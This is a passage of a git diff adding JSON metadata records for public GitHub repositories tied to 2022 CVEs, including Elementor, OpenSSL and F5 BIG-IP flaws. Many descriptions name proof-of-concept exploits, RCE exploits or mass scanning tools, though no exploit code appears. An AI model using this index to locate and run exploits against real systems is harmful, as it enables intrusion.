"2022-03-29T20:06:33Z", + "updated_at": "2024-08-12T20:21:58Z", + "pushed_at": "2022-03-30T17:59:09Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1119.json b/2022/CVE-2022-1119.json new file mode 100644 index 0000000000..eeac267376 --- /dev/null +++ b/2022/CVE-2022-1119.json @@ -0,0 +1,33 @@ +[ + { + "id": 519086294, + "name": "CVE-2022-1119", + "full_name": "z92g\/CVE-2022-1119", + "owner": { + "login": "z92g", + "id": 108780847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108780847?v=4", + "html_url": "https:\/\/github.com\/z92g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z92g\/CVE-2022-1119", + "description": "WordPress Simple File List FileRead POC", + "fork": false, + "created_at": "2022-07-29T05:04:26Z", + "updated_at": "2023-04-27T05:22:13Z", + "pushed_at": "2022-07-30T08:12:45Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1162.json b/2022/CVE-2022-1162.json new file mode 100644 index 0000000000..637d13eb68 --- /dev/null +++ b/2022/CVE-2022-1162.json @@ -0,0 +1,64 @@ +[ + { + "id": 480769985, + "name": "CVE-2022-1162", + "full_name": "Greenwolf\/CVE-2022-1162", + "owner": { + "login": "Greenwolf", + "id": 48361984, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48361984?v=4", + "html_url": "https:\/\/github.com\/Greenwolf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Greenwolf\/CVE-2022-1162", + "description": null, + "fork": false, + "created_at": "2022-04-12T10:56:10Z", + "updated_at": "2022-11-09T09:46:37Z", + "pushed_at": "2022-04-12T10:59:41Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 563734755, + "name": "CVE-2022-1162", + "full_name": "ipsBruno\/CVE-2022-1162", + "owner": { + "login": "ipsBruno", + "id": 6839604, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6839604?v=4", + "html_url": "https:\/\/github.com\/ipsBruno", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ipsBruno\/CVE-2022-1162", + "description": "A simple tool to enumerate users in gitlab", + "fork": false, + "created_at": "2022-11-09T08:14:28Z", + "updated_at": "2024-11-04T00:36:43Z", + "pushed_at": "2022-11-09T09:30:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1175.json b/2022/CVE-2022-1175.json new file mode 100644 index 0000000000..2a62ee6f3c --- /dev/null +++ b/2022/CVE-2022-1175.json @@ -0,0 +1,33 @@ +[ + { + "id": 480771548, + "name": "CVE-2022-1175", + "full_name": "Greenwolf\/CVE-2022-1175", + "owner": { + "login": "Greenwolf", + "id": 48361984, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48361984?v=4", + "html_url": "https:\/\/github.com\/Greenwolf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Greenwolf\/CVE-2022-1175", + "description": null, + "fork": false, + "created_at": "2022-04-12T11:00:56Z", + "updated_at": "2022-11-09T18:15:42Z", + "pushed_at": "2022-04-12T11:14:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1203.json b/2022/CVE-2022-1203.json new file mode 100644 index 0000000000..c9aa6c3faf --- /dev/null +++ b/2022/CVE-2022-1203.json @@ -0,0 +1,33 @@ +[ + { + "id": 674165540, + "name": "CVE-2022-1203", + "full_name": "RandomRobbieBF\/CVE-2022-1203", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2022-1203", + "description": "Content Mask < 1.8.4 - Subscriber+ Arbitrary Options Update", + "fork": false, + "created_at": "2023-08-03T09:39:15Z", + "updated_at": "2024-08-12T20:32:20Z", + "pushed_at": "2023-08-03T09:43:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1227.json b/2022/CVE-2022-1227.json new file mode 100644 index 0000000000..c36631ea94 --- /dev/null +++ b/2022/CVE-2022-1227.json @@ -0,0 +1,33 @@ +[ + { + "id": 622123920, + "name": "CVE-2022-1227_Exploit", + "full_name": "iridium-soda\/CVE-2022-1227_Exploit", + "owner": { + "login": "iridium-soda", + "id": 32727642, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32727642?v=4", + "html_url": "https:\/\/github.com\/iridium-soda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iridium-soda\/CVE-2022-1227_Exploit", + "description": "A script for exploiting CVE-2022-1227", + "fork": false, + "created_at": "2023-04-01T07:28:15Z", + "updated_at": "2024-06-20T08:23:31Z", + "pushed_at": "2023-04-13T12:36:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1292.json b/2022/CVE-2022-1292.json new file mode 100644 index 0000000000..870939369f --- /dev/null +++ b/2022/CVE-2022-1292.json @@ -0,0 +1,163 @@ +[ + { + "id": 495754279, + "name": "CVE-2022-1292", + "full_name": "li8u99\/CVE-2022-1292", + "owner": { + "login": "li8u99", + "id": 37184853, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37184853?v=4", + "html_url": "https:\/\/github.com\/li8u99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/li8u99\/CVE-2022-1292", + "description": "CVE-2022-1292", + "fork": false, + "created_at": "2022-05-24T09:26:29Z", + "updated_at": "2024-08-12T20:23:31Z", + "pushed_at": "2022-05-24T09:54:07Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 497983595, + "name": "CVE-2022-1292", + "full_name": "alcaparra\/CVE-2022-1292", + "owner": { + "login": "alcaparra", + "id": 105424007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105424007?v=4", + "html_url": "https:\/\/github.com\/alcaparra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alcaparra\/CVE-2022-1292", + "description": "CVE-2022-1292 OpenSSL c_rehash Vulnerability - POC", + "fork": false, + "created_at": "2022-05-30T14:45:15Z", + "updated_at": "2024-10-14T01:06:06Z", + "pushed_at": "2022-07-20T14:27:49Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "c-rehash", + "cve", + "cve-2022-1292", + "openssl", + "poc" + ], + "visibility": "public", + "forks": 7, + "watchers": 24, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 498028990, + "name": "CVE-2022-1292", + "full_name": "rama291041610\/CVE-2022-1292", + "owner": { + "login": "rama291041610", + "id": 14837139, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14837139?v=4", + "html_url": "https:\/\/github.com\/rama291041610", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rama291041610\/CVE-2022-1292", + "description": "CVE-2022-1292 OpenSSL c_rehash Vulnerability", + "fork": false, + "created_at": "2022-05-30T16:59:54Z", + "updated_at": "2023-12-13T03:38:10Z", + "pushed_at": "2022-05-30T17:00:34Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 531401741, + "name": "CVE-2022-1292", + "full_name": "greek0x0\/CVE-2022-1292", + "owner": { + "login": "greek0x0", + "id": 104328056, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104328056?v=4", + "html_url": "https:\/\/github.com\/greek0x0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/greek0x0\/CVE-2022-1292", + "description": "OpenSSL", + "fork": false, + "created_at": "2022-09-01T07:00:00Z", + "updated_at": "2023-07-06T22:18:33Z", + "pushed_at": "2022-09-01T07:00:56Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 536322502, + "name": "CVE-2022-1292", + "full_name": "und3sc0n0c1d0\/CVE-2022-1292", + "owner": { + "login": "und3sc0n0c1d0", + "id": 32236059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32236059?v=4", + "html_url": "https:\/\/github.com\/und3sc0n0c1d0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/und3sc0n0c1d0\/CVE-2022-1292", + "description": "Automation to validate the impact of the vulnerability CVE-2022-1292 on a specific system.", + "fork": false, + "created_at": "2022-09-13T22:01:05Z", + "updated_at": "2024-10-26T07:16:57Z", + "pushed_at": "2022-12-09T06:58:25Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1329.json b/2022/CVE-2022-1329.json new file mode 100644 index 0000000000..a63ebe467e --- /dev/null +++ b/2022/CVE-2022-1329.json @@ -0,0 +1,194 @@ +[ + { + "id": 482065912, + "name": "CVE-2022-1329-WordPress-Elementor-3.6.0-3.6.1-3.6.2-Remote-Code-Execution-Exploit", + "full_name": "AkuCyberSec\/CVE-2022-1329-WordPress-Elementor-3.6.0-3.6.1-3.6.2-Remote-Code-Execution-Exploit", + "owner": { + "login": "AkuCyberSec", + "id": 103601332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103601332?v=4", + "html_url": "https:\/\/github.com\/AkuCyberSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AkuCyberSec\/CVE-2022-1329-WordPress-Elementor-3.6.0-3.6.1-3.6.2-Remote-Code-Execution-Exploit", + "description": null, + "fork": false, + "created_at": "2022-04-15T19:37:35Z", + "updated_at": "2024-11-27T09:45:32Z", + "pushed_at": "2022-04-22T17:55:37Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 482438268, + "name": "CVE-2022-1329", + "full_name": "mcdulltii\/CVE-2022-1329", + "owner": { + "login": "mcdulltii", + "id": 30497633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30497633?v=4", + "html_url": "https:\/\/github.com\/mcdulltii", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mcdulltii\/CVE-2022-1329", + "description": "WordPress Elementor 3.6.0 3.6.1 3.6.2 RCE POC", + "fork": false, + "created_at": "2022-04-17T05:44:45Z", + "updated_at": "2024-08-20T12:26:48Z", + "pushed_at": "2022-04-17T05:53:54Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-1329", + "elementor", + "poc", + "rce", + "wordpress" + ], + "visibility": "public", + "forks": 8, + "watchers": 15, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 483460698, + "name": "CVE-2022-1329-WordPress-Elementor-RCE", + "full_name": "Grazee\/CVE-2022-1329-WordPress-Elementor-RCE", + "owner": { + "login": "Grazee", + "id": 12786402, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12786402?v=4", + "html_url": "https:\/\/github.com\/Grazee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Grazee\/CVE-2022-1329-WordPress-Elementor-RCE", + "description": null, + "fork": false, + "created_at": "2022-04-20T01:06:01Z", + "updated_at": "2024-07-10T05:16:10Z", + "pushed_at": "2022-04-20T03:38:43Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 594762176, + "name": "CVE-2022-1329", + "full_name": "dexit\/CVE-2022-1329", + "owner": { + "login": "dexit", + "id": 6205151, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6205151?v=4", + "html_url": "https:\/\/github.com\/dexit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dexit\/CVE-2022-1329", + "description": "The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized execution of several AJAX actions due to a missing capability check in the ~\/core\/app\/modules\/onboarding\/module.php file that make it possible for attackers to modify site data in addition to uploading malicious files that can be used to o CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-29T15:13:34Z", + "updated_at": "2023-02-20T12:39:20Z", + "pushed_at": "2022-12-28T12:11:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818198561, + "name": "CVE-2022-1329", + "full_name": "phanthibichtram12\/CVE-2022-1329", + "owner": { + "login": "phanthibichtram12", + "id": 95855503, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95855503?v=4", + "html_url": "https:\/\/github.com\/phanthibichtram12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phanthibichtram12\/CVE-2022-1329", + "description": null, + "fork": false, + "created_at": "2024-06-21T10:05:03Z", + "updated_at": "2024-06-21T10:38:10Z", + "pushed_at": "2024-06-21T10:38:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 871297880, + "name": "CVE-2022-1329", + "full_name": "AgustinESI\/CVE-2022-1329", + "owner": { + "login": "AgustinESI", + "id": 73068658, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73068658?v=4", + "html_url": "https:\/\/github.com\/AgustinESI", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AgustinESI\/CVE-2022-1329", + "description": null, + "fork": false, + "created_at": "2024-10-11T16:57:20Z", + "updated_at": "2024-10-12T11:13:11Z", + "pushed_at": "2024-10-12T11:13:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1364.json b/2022/CVE-2022-1364.json new file mode 100644 index 0000000000..b9efe61b91 --- /dev/null +++ b/2022/CVE-2022-1364.json @@ -0,0 +1,33 @@ +[ + { + "id": 722060198, + "name": "cve-2022-1364", + "full_name": "A1Lin\/cve-2022-1364", + "owner": { + "login": "A1Lin", + "id": 22007644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22007644?v=4", + "html_url": "https:\/\/github.com\/A1Lin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/A1Lin\/cve-2022-1364", + "description": null, + "fork": false, + "created_at": "2023-11-22T10:55:34Z", + "updated_at": "2024-02-12T08:33:55Z", + "pushed_at": "2023-11-22T11:09:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1386.json b/2022/CVE-2022-1386.json new file mode 100644 index 0000000000..0476ef2cbf --- /dev/null +++ b/2022/CVE-2022-1386.json @@ -0,0 +1,133 @@ +[ + { + "id": 607455905, + "name": "CVE-2022-1386", + "full_name": "ardzz\/CVE-2022-1386", + "owner": { + "login": "ardzz", + "id": 38525912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38525912?v=4", + "html_url": "https:\/\/github.com\/ardzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ardzz\/CVE-2022-1386", + "description": null, + "fork": false, + "created_at": "2023-02-28T02:08:59Z", + "updated_at": "2024-09-21T12:00:44Z", + "pushed_at": "2023-03-09T16:25:57Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 609709956, + "name": "fubucker", + "full_name": "im-hanzou\/fubucker", + "owner": { + "login": "im-hanzou", + "id": 61415393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4", + "html_url": "https:\/\/github.com\/im-hanzou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-hanzou\/fubucker", + "description": "Automatic Mass Tool for checking vulnerability in CVE-2022-1386 - Fusion Builder < 3.6.2 - Unauthenticated SSRF", + "fork": false, + "created_at": "2023-03-05T01:46:41Z", + "updated_at": "2024-06-04T12:12:38Z", + "pushed_at": "2023-03-08T18:25:29Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "avada", + "checker", + "cve-2022-1386", + "fusion-builder", + "theme-fusion", + "wordpress" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 697749113, + "name": "CVE-2022-1386-Mass_Vulnerability", + "full_name": "zycoder0day\/CVE-2022-1386-Mass_Vulnerability", + "owner": { + "login": "zycoder0day", + "id": 31403046, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31403046?v=4", + "html_url": "https:\/\/github.com\/zycoder0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zycoder0day\/CVE-2022-1386-Mass_Vulnerability", + "description": null, + "fork": false, + "created_at": "2023-09-28T11:55:43Z", + "updated_at": "2023-09-28T17:30:07Z", + "pushed_at": "2023-09-28T11:56:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 768474131, + "name": "CVE-2022-1386", + "full_name": "satyasai1460\/CVE-2022-1386", + "owner": { + "login": "satyasai1460", + "id": 68277833, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68277833?v=4", + "html_url": "https:\/\/github.com\/satyasai1460", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/satyasai1460\/CVE-2022-1386", + "description": null, + "fork": false, + "created_at": "2024-03-07T06:35:33Z", + "updated_at": "2024-03-07T14:37:43Z", + "pushed_at": "2024-03-07T06:54:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-1388.json b/2022/CVE-2022-1388.json new file mode 100644 index 0000000000..ed9d74afaf --- /dev/null +++ b/2022/CVE-2022-1388.json @@ -0,0 +1,2125 @@ +[ + { + "id": 488929451, + "name": "CVE-2022-1388", + "full_name": "numanturle\/CVE-2022-1388", + "owner": { + "login": "numanturle", + "id": 7007951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7007951?v=4", + "html_url": "https:\/\/github.com\/numanturle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/numanturle\/CVE-2022-1388", + "description": "K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388", + "fork": false, + "created_at": "2022-05-05T10:35:35Z", + "updated_at": "2024-05-10T10:45:33Z", + "pushed_at": "2022-05-09T21:09:45Z", + "stargazers_count": 53, + "watchers_count": 53, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 53, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 489026843, + "name": "CVE-2022-1388-checker", + "full_name": "jheeree\/CVE-2022-1388-checker", + "owner": { + "login": "jheeree", + "id": 19227591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19227591?v=4", + "html_url": "https:\/\/github.com\/jheeree", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jheeree\/CVE-2022-1388-checker", + "description": "Simple script realizado en bash, para revisión de múltiples hosts para CVE-2022-1388 (F5)", + "fork": false, + "created_at": "2022-05-05T15:25:53Z", + "updated_at": "2024-11-18T06:36:25Z", + "pushed_at": "2022-05-05T22:49:40Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 25, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 489240417, + "name": "Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed", + "full_name": "MrCl0wnLab\/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed", + "owner": { + "login": "MrCl0wnLab", + "id": 17049332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17049332?v=4", + "html_url": "https:\/\/github.com\/MrCl0wnLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrCl0wnLab\/Nuclei-Template-CVE-2022-1388-BIG-IP-iControl-REST-Exposed", + "description": "This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and\/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.", + "fork": false, + "created_at": "2022-05-06T06:22:47Z", + "updated_at": "2024-05-10T10:45:34Z", + "pushed_at": "2022-05-06T15:33:14Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bigip", + "bigip-rest-api", + "cve-2022-1388", + "nuclei", + "nuclei-detection", + "nuclei-templates" + ], + "visibility": "public", + "forks": 9, + "watchers": 23, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 489669248, + "name": "westone-CVE-2022-1388-scanner", + "full_name": "Osyanina\/westone-CVE-2022-1388-scanner", + "owner": { + "login": "Osyanina", + "id": 78467376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4", + "html_url": "https:\/\/github.com\/Osyanina", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2022-1388-scanner", + "description": "A vulnerability scanner that detects CVE-2021-21980 vulnerabilities.", + "fork": false, + "created_at": "2022-05-07T12:36:41Z", + "updated_at": "2022-05-07T12:37:01Z", + "pushed_at": "2022-05-07T12:41:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 489745068, + "name": "CVE-2022-1388-EXP", + "full_name": "doocop\/CVE-2022-1388-EXP", + "owner": { + "login": "doocop", + "id": 52679771, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52679771?v=4", + "html_url": "https:\/\/github.com\/doocop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/doocop\/CVE-2022-1388-EXP", + "description": "CVE-2022-1388 F5 BIG-IP RCE 批量检测", + "fork": false, + "created_at": "2022-05-07T17:54:08Z", + "updated_at": "2024-11-06T23:16:23Z", + "pushed_at": "2022-05-09T11:15:27Z", + "stargazers_count": 93, + "watchers_count": 93, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 23, + "watchers": 93, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 489899447, + "name": "CVE-2022-1388-RCE-checker-and-POC-Exploit", + "full_name": "blind-intruder\/CVE-2022-1388-RCE-checker-and-POC-Exploit", + "owner": { + "login": "blind-intruder", + "id": 41877347, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41877347?v=4", + "html_url": "https:\/\/github.com\/blind-intruder", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/blind-intruder\/CVE-2022-1388-RCE-checker-and-POC-Exploit", + "description": null, + "fork": false, + "created_at": "2022-05-08T09:28:19Z", + "updated_at": "2023-03-05T05:01:36Z", + "pushed_at": "2022-05-12T11:46:56Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 490120378, + "name": "CVE-2022-1388", + "full_name": "Hudi233\/CVE-2022-1388", + "owner": { + "login": "Hudi233", + "id": 20939673, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20939673?v=4", + "html_url": "https:\/\/github.com\/Hudi233", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hudi233\/CVE-2022-1388", + "description": null, + "fork": false, + "created_at": "2022-05-09T03:20:46Z", + "updated_at": "2022-05-09T03:30:48Z", + "pushed_at": "2022-05-09T03:35:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490182003, + "name": "CVE-2022-1388-Exploit-POC", + "full_name": "sherlocksecurity\/CVE-2022-1388-Exploit-POC", + "owner": { + "login": "sherlocksecurity", + "id": 52328067, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52328067?v=4", + "html_url": "https:\/\/github.com\/sherlocksecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sherlocksecurity\/CVE-2022-1388-Exploit-POC", + "description": "PoC for CVE-2022-1388_F5_BIG-IP", + "fork": false, + "created_at": "2022-05-09T07:39:55Z", + "updated_at": "2024-10-21T10:38:19Z", + "pushed_at": "2022-05-15T02:30:40Z", + "stargazers_count": 57, + "watchers_count": 57, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 57, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 490229104, + "name": "CVE-2022-1388", + "full_name": "yukar1z0e\/CVE-2022-1388", + "owner": { + "login": "yukar1z0e", + "id": 44317939, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44317939?v=4", + "html_url": "https:\/\/github.com\/yukar1z0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yukar1z0e\/CVE-2022-1388", + "description": "batch scan CVE-2022-1388", + "fork": false, + "created_at": "2022-05-09T10:06:11Z", + "updated_at": "2022-08-16T11:10:19Z", + "pushed_at": "2022-05-09T10:07:45Z", + "stargazers_count": 1, + 